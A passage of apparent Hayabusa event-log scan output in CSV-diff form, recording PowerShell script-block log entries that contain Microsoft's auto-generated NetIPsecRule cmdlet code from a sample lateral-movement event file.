($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecRule' -Alias '*' function Show-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.080 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetIPsecRule' -Alias '*' function Find-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Find2')] [string] ${LocalAddress}, [Parameter(ParameterSetName='Find2', Mandatory=$true)] [string] ${RemoteAddress}, [Parameter(ParameterSetName='Find2')] [string] ${Protocol}, [Parameter(ParameterSetName='Find2')] [uint16] ${LocalPort}, [Parameter(ParameterSetName='Find2')] [uint16] ${RemotePort}, [Parameter(ParameterSetName='Find2')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Find2')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Find2')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CmdletOutput'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Find', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Find-NetIPsecRule' -Alias '*' function Get-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeli",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.080 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = 